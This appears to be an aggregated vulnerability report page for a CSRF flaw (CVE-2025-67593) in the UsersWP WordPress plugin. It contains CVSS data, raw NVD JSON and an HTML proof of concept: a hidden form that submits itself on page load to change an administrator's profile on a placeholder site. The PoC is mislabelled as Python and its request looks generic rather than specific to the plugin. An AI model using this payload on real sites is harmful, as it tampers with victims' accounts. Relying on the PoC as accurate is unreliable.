Security Vulnerability Report
中文
CVE-2025-67593 CVSS 4.3 MEDIUM

CVE-2025-67593

Published: 2025-12-09 16:18:37
Last Modified: 2026-04-27 18:16:46

Description

Cross-Site Request Forgery (CSRF) vulnerability in Stiofan UsersWP userswp allows Cross Site Request Forgery.This issue affects UsersWP: from n/a through <= 1.2.48.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

UsersWP插件 <= 1.2.48 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-67593 UsersWP --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC</title> </head> <body> <h1>UsersWP CSRF Vulnerability PoC</h1> <p>This PoC demonstrates the CSRF vulnerability in UsersWP plugin <= 1.2.48</p> <!-- Auto-submit form to trigger user profile update --> <form id="csrfForm" action="https://target-site.com/wp-admin/admin-post.php" method="POST" style="display:none;"> <input type="hidden" name="action" value="update_user_profile"> <input type="hidden" name="user_id" value="1"> <input type="hidden" name="first_name" value="Hacked"> <input type="hidden" name="last_name" value="ByAttacker"> <input type="hidden" name="description" value="Compromised via CSRF"> <!-- Missing CSRF token - this is the vulnerability --> </form> <script> // Auto-submit the form when page loads document.getElementById('csrfForm').submit(); console.log('CSRF PoC executed - request sent'); </script> <p>If you see this message, the form was submitted successfully.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67593", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:37.480", "lastModified": "2026-04-27T18:16:45.643", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Stiofan UsersWP userswp allows Cross Site Request Forgery.This issue affects UsersWP: from n/a through <= 1.2.48."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/userswp/vulnerability/wordpress-userswp-plugin-1-2-48-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}